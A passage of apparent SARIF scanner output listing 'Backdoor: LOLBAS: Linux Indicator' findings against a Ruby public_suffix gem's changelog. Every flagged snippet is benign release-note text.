                      "markdown": "`and/or removed. You can find more information at GH-133.\n\n- CHANGED: Updated definitions.\n- CHANGED: Dropped support for Ruby < 2.1\n- CHANGED: `PublicSuffix::List#rules` is now protected. You should not rely on it as the internal rule representation is subject to change to optimize performances.\n- CHANGED: Removed `PublicSuffix::List.clear`, it was an unnecessary accessor method. Use `PublicSuffix::List.default = nil` if you **really** need to reset the default list. You shouldn't.\n- CHANGED: `PublicSuffix::List#select` is now private. You should not use it, instead use `PublicSuffix::List#find`.\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 177,
                  "startColumn": 23,
                  "endLine": 177,
                  "endColumn": 29,
                  "snippet": {
                    "text": "improve the lookup time while reducing storage space.\n\nFor this reason, several public methods that are no longer applicable have been deprecated\nand/or removed. You can find more information at GH-133.\n\n- CHANGED: Updated definitions.\n- CHANGED: Dropped support for Ruby < 2.1\n",
                    "rendered": {
                      "text": "improve the lookup time while reducing storage space.\n\nFor this reason, several public methods that are no longer applicable have been deprecated\nand/or removed. You can find more information at GH-133.\n\n- CHANGED: Updated definitions.\n- CHANGED: Dropped support for Ruby < 2.1\n",
                      "markdown": "`improve the lookup time while reducing storage space.\n\nFor this reason, several public methods that are no longer applicable have been deprecated\nand/or removed. You can find more information at GH-133.\n\n- CHANGED: Updated definitions.\n- CHANGED: Dropped support for Ruby < 2.1\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 174,
                  "startColumn": 18,
                  "endLine": 174,
                  "endColumn": 24,
                  "snippet": {
                    "text": "## Release 3.0.0\n\nThis new version includes a major redesign of the library internals, with the goal to drastically\nimprove the lookup time while reducing storage space.\n\nFor this reason, several public methods that are no longer applicable have been deprecated\nand/or removed. You can find more information at GH-133.\n",
                    "rendered": {
                      "text": "## Release 3.0.0\n\nThis new version includes a major redesign of the library internals, with the goal to drastically\nimprove the lookup time while reducing storage space.\n\nFor this reason, several public methods that are no longer applicable have been deprecated\nand/or removed. You can find more information at GH-133.\n",
                      "markdown": "`## Release 3.0.0\n\nThis new version includes a major redesign of the library internals, with the goal to drastically\nimprove the lookup time while reducing storage space.\n\nFor this reason, several public methods that are no longer applicable have been deprecated\nand/or removed. You can find more information at GH-133.\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 151,
                  "startColumn": 18,
                  "endLine": 151,
                  "endColumn": 24,
                  "snippet": {
                    "text": "## Release 3.1.0\n\n- CHANGED: Updated definitions.\n- CHANGED: Minimum Ruby version is 2.3\n- CHANGED: Upgraded to Bundler 2.x\n\n\n",
                    "rendered": {
                      "text": "## Release 3.1.0\n\n- CHANGED: Updated definitions.\n- CHANGED: Minimum Ruby version is 2.3\n- CHANGED: Upgraded to Bundler 2.x\n\n\n",
                      "markdown": "`## Release 3.1.0\n\n- CHANGED: Updated definitions.\n- CHANGED: Minimum Ruby version is 2.3\n- CHANGED: Upgraded to Bundler 2.x\n\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 145,
                  "startColumn": 65,
                  "endLine": 145,
                  "endColumn": 71,
                  "snippet": {
                    "text": "- CHANGED: Updated definitions.\n- CHANGED: Rolled back support for Ruby 2.3 (GH-161, GH-162)\n\nIMPORTANT: 3.x is the latest version compatible with Ruby 2.1 and Ruby 2.2.\n\n\n## Release 3.1.0\n",
                    "rendered": {
                      "text": "- CHANGED: Updated definitions.\n- CHANGED: Rolled back support for Ruby 2.3 (GH-161, GH-162)\n\nIMPORTANT: 3.x is the latest version compatible with Ruby 2.1 and Ruby 2.2.\n\n\n## Release 3.1.0\n",
                      "markdown": "`- CHANGED: Updated definitions.\n- CHANGED: Rolled back support for Ruby 2.3 (GH-161, GH-162)\n\nIMPORTANT: 3.x is the latest version compatible with Ruby 2.1 and Ruby 2.2.\n\n\n## Release 3.1.0\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 145,
                  "startColumn": 52,
                  "endLine": 145,
                  "endColumn": 58,
                  "snippet": {
                    "text": "- CHANGED: Updated definitions.\n- CHANGED: Rolled back support for Ruby 2.3 (GH-161, GH-162)\n\nIMPORTANT: 3.x is the latest version compatible with Ruby 2.1 and Ruby 2.2.\n\n\n## Release 3.1.0\n",
                    "rendered": {
                      "text": "- CHANGED: Updated definitions.\n- CHANGED: Rolled back support for Ruby 2.3 (GH-161, GH-162)\n\nIMPORTANT: 3.x is the latest version compatible with Ruby 2.1 and Ruby 2.2.\n\n\n## Release 3.1.0\n",
                      "markdown": "`- CHANGED: Updated definitions.\n- CHANGED: Rolled back support for Ruby 2.3 (GH-161, GH-162)\n\nIMPORTANT: 3.x is the latest version compatible with Ruby 2.1 and Ruby 2.2.\n\n\n## Release 3.1.0\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 143,
                  "startColumn": 34,
                  "endLine": 143,
                  "endColumn": 40,
                  "snippet": {
                    "text": "## Release 3.1.1\n\n- CHANGED: Updated definitions.\n- CHANGED: Rolled back support for Ruby 2.3 (GH-161, GH-162)\n\nIMPORTANT: 3.x is the latest version compatible with Ruby 2.1 and Ruby 2.2.\n\n",
                    "rendered": {
                      "text": "## Release 3.1.1\n\n- CHANGED: Updated definitions.\n- CHANGED: Rolled back support for Ruby 2.3 (GH-161, GH-162)\n\nIMPORTANT: 3.x is the latest version compatible with Ruby 2.1 and Ruby 2.2.\n\n",
                      "markdown": "`## Release 3.1.1\n\n- CHANGED: Updated definitions.\n- CHANGED: Rolled back support for Ruby 2.3 (GH-161, GH-162)\n\nIMPORTANT: 3.x is the latest version compatible with Ruby 2.1 and Ruby 2.2.\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 137,
                  "startColumn": 9,
                  "endLine": 137,
                  "endColumn": 15,
                  "snippet": {
                    "text": "\n### Changed\n\n- Minimum Ruby version is 2.3\n\n\n## Release 3.1.1\n",
                    "rendered": {
                      "text": "\n### Changed\n\n- Minimum Ruby version is 2.3\n\n\n## Release 3.1.1\n",
                      "markdown": "`\n### Changed\n\n- Minimum Ruby version is 2.3\n\n\n## Release 3.1.1\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 76,
                  "startColumn": 9,
                  "endLine": 76,
                  "endColumn": 15,
                  "snippet": {
                    "text": "\n### Changed\n\n- Minimum Ruby version is 2.6\n- Updated definitions.\n\n\n",
                    "rendered": {
                      "text": "\n### Changed\n\n- Minimum Ruby version is 2.6\n- Updated definitions.\n\n\n",
                      "markdown": "`\n### Changed\n\n- Minimum Ruby version is 2.6\n- Updated definitions.\n\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 33,
                  "startColumn": 9,
                  "endLine": 33,
                  "endColumn": 15,
                  "snippet": {
                    "text": "### Changed\n\n- Updated definitions.\n- Minimum Ruby version is 3.0\n\n\n## 5.0.5\n",
                    "rendered": {
                      "text": "### Changed\n\n- Updated definitions.\n- Minimum Ruby version is 3.0\n\n\n## 5.0.5\n",
                      "markdown": "`### Changed\n\n- Updated definitions.\n- Minimum Ruby version is 3.0\n\n\n## 5.0.5\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 25,
                  "startColumn": 84,
                  "endLine": 25,
                  "endColumn": 90,
                  "snippet": {
                    "text": "\n## 5.1.1\n\nNo significant changes. Releasing a mini version to address 5.1.0 release with major ruby requirement change (GH-315).\n\n\n## 5.1.0\n",
                    "rendered": {
                      "text": "\n## 5.1.1\n\nNo significant changes. Releasing a mini version to address 5.1.0 release with major ruby requirement change (GH-315).\n\n\n## 5.1.0\n",
                      "markdown": "`\n## 5.1.1\n\nNo significant changes. Releasing a mini version to address 5.1.0 release with major ruby requirement change (GH-315).\n\n\n## 5.1.0\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 20,
                  "startColumn": 9,
                  "endLine": 20,
                  "endColumn": 15,
                  "snippet": {
                    "text": "### Changed\n\n- Updated definitions.\n- Minimum Ruby version is 3.0\n\n\n## 5.1.1\n",
                    "rendered": {
                      "text": "### Changed\n\n- Updated definitions.\n- Minimum Ruby version is 3.0\n\n\n## 5.1.1\n",
                      "markdown": "`### Changed\n\n- Updated definitions.\n- Minimum Ruby version is 3.0\n\n\n## 5.1.1\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/CHANGELOG.md"
                },
                "region": {
                  "startLine": 15,
                  "startColumn": 68,
                  "endLine": 15,
                  "endColumn": 74,
                  "snippet": {
                    "text": "\n## 6.0.0\n\nSame as 5.1.0. Re-releasing as a major version change due to a major ruby version requirement change.\n\n### Changed\n\n",
                    "rendered": {
                      "text": "\n## 6.0.0\n\nSame as 5.1.0. Re-releasing as a major version change due to a major ruby version requirement change.\n\n### Changed\n\n",
                      "markdown": "`\n## 6.0.0\n\nSame as 5.1.0. Re-releasing as a major version change due to a major ruby version requirement change.\n\n### Changed\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        }
      ],
      "columnKind": "utf16CodeUnits"
    }
  ]
}